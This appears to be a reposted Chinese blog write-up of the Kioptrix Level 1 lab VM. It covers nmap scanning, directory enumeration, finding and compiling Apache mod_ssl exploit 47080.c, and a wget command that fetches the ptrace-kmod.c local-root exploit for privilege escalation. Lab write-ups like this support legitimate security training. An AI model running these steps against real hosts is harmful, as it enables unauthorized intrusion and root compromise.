当前位置: 首页 > news >正文

Kioptrix Level1

news 2025/6/29 15:28:26

靶机截图

收集信息

主机发现

靶机地址为10.4.7.221

nmap -sP 10.4.7.0/24

端口扫描

nmap -sS -O -sV -p- 10.4.7.221

PORT

STATE

SERVICE

VERSION

22/tcp

open

ssh

OpenSSH 2.9p2 (protocol 1.99)

80/tcp

open

http

Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

111/tcp

open

rpcbind

2 (RPC #100000)

443/tcp

open

Apache/1.3.20 (Unix)

Apache httpd 2.0.52 ((CentOS))

139/tcp

open

netbios-ssn

Samba smbd (workgroup: MYGROUP)

1024/tcp

open

status

1 (RPC #100024)

系统版本为linux 2.4.9-2.4.18

web指纹

目录扫描

dirsearch -u http://10.4.7.221

访问下随便点点看到有Apache的版本

渗透过程

根据上面的信息,搜一下exp

searchsploit Apache 1.3.20

看着都像,一个一个试试

前两个都编译不成功,47080.c可以编译。

显示很多过滤下,前面得知为redhat,那么咱们就试下0x6a和0x6b

0x6a不行

试试0x6b,ok没毛病

提权

根据提示去下载

wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

下载成功后传至靶机进行编译

总结

1.exp利用

http://www.xdnf.cn/news/1072873.html

相关文章:

  • TCP 在高速网络下的大数据量传输优化:拥塞控制、效率保障与协议演进​
  • 开源3D 动态银河系特效:Vue 与 THREE.JS 的奇幻之旅
  • 在项目中如何巧妙使用缓存
  • MCPA2APPT:基于 A2A+MCP+ADK 的多智能体流式并发高质量 PPT 智能生成系统
  • spring-ai 1.0.0 (2)提示词,消息构建和移植能力
  • 华为云Flexus+DeepSeek征文 | 华为云ModelArts Studio实战指南:创建高效的AingDesk知识库问答助手
  • 复杂驱动开发-TLE9471的休眠流程与定时唤醒
  • python解释器 与 pip脚本常遇到的问题汇总
  • WPF XAML 格式化工具(XAML Styler)
  • 机器学习开篇:算法分类与开发流程
  • 网络安全体系结构和安全防护
  • Bootstrap 5学习教程,从入门到精通,Bootstrap 5 Flex 布局语法知识点及案例(27)
  • 【安卓Sensor框架-1】SensorService 的启动流程
  • 深入理解C#委托操作:添加、移除与调用全解析
  • 从台式电脑硬件架构看前后端分离开发模式
  • VScode使用usb转网口远程开发rk3588
  • Docker拉取不兼容的镜像解决办法
  • JWT认证性能优化实战指南
  • 【21】C9800配置PSK认证的WLAN
  • 机器学习——线性回归
  • 嵌入式C语言数组:数组/字符数组
  • NV046NV060美光固态闪存NV061NV063
  • ABP VNext + 多数据库混合:SQL Server+PostgreSQL+MySQL
  • Webpack 核心与基础使用
  • 设计模式精讲 Day 17:中介者模式(Mediator Pattern)
  • 微软人工智能证书AI-102 | 如何快速通过?
  • 机器学习框架(1)
  • 【Elasticsearch】全文检索 组合检索
  • 基于MFC的遥感图像匹配程序设计
  • ML与DL的本质区别是什么?(考研复试版)